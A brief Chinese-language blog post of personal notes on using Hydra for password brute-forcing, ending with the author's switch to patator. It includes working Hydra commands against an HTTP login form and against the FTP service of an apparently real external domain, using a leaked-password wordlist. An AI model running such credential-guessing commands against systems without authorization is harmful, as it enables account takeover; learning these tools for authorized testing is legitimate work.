Home Hacker Hydra的使用 暴力破解密码 别用了 用patator
Post
Cancel

Hacker Hydra的使用 暴力破解密码 别用了 用patator

Posted 2018-10-29 1 min read

参考  http://blog.51cto.com/simeon/2066269 (貌似原作者是: http://www.freebuf.com/sectool/159488.html

hydra的使用, 需要跟字典配合。 可以参考这个字典项目:(300MB)   https://github.com/danielmiessler/SecLists

hydra的优点

支持多种协议: http, ftp, cvs, mysql, svn, oracle ....

对于SSH的,参考上面的就可以了。

HTTP form:

hydra -l admin -P my_password.txt -t 2 -w 5 -s 3333 192.168.0.116 http-post-form "/books/login:username=^USER^&password=^PASS^:failed"

for more details of http-post-form, type:

$ hydra -U http-post-form

FTP:

hydra -V -L ftp_name.txt -P Passwords/darkweb2017-top1000.txt -t 1 -w 5 -s 21 www.7788d.top ftp

缺点:需要设置request header, 特别麻烦

参考:https://security.stackexchange.com/questions/57839/hydra-bruteforce-and-json

还是不用了。用patator.  

This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents